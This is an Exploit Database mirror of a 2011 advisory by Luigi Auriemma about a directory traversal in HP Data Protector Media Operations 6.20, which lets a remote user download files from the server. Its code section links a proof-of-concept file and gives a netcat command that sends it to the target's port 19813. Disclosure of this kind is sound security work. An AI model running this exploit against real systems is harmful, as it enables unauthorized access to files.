HP Data Protector Media Operations 6.20 – Directory Traversal

• Exploit Database
• 9 阅读

• 作者： Luigi Auriemma
  日期： 2011-11-04
• 类别：

  • webapps
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/18077/

• #######################################################################
  
   Luigi Auriemma
  
  Application:HP Data Protector Media Operations
  http://www8.hp.com/us/en/software/software-product.html?compURI=tcm:245-936920
  Versions: <= 6.20
  Platforms:Windows and others
  Bug:directory traversal
  Exploitation: remote, versus server
  Date: 03 Nov 2011 (found 06 Jul 2011)
  Author: Luigi Auriemma
  e-mail: aluigi@autistici.org
  web:aluigi.org
  
  
  #######################################################################
  
  
  1) Introduction
  2) Bug
  3) The Code
  4) Fix
  
  
  #######################################################################
  
  ===============
  1) Introduction
  ===============
  
  
  From vendor's homepage:
  "HP data protection software reduces backup and recovery complexity and
  cost by protecting virtual and physical applications—whether you have
  one server or thousands."
  
  
  #######################################################################
  
  ======
  2) Bug
  ======
  
  
  Directory traversal through opcode 0x10 which allows to download the
  files in the partition where is installed the program.
  
  
  #######################################################################
  
  ===========
  3) The Code
  ===========
  
  
  http://aluigi.org/poc/hpdpmedia_1.dat
  https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18077.dat
  
  nc SERVER 19813 < hpdpmedia_1.dat
  
  
  #######################################################################
  
  ======
  4) Fix
  ======
  
  
  No fix.
  
  
  #######################################################################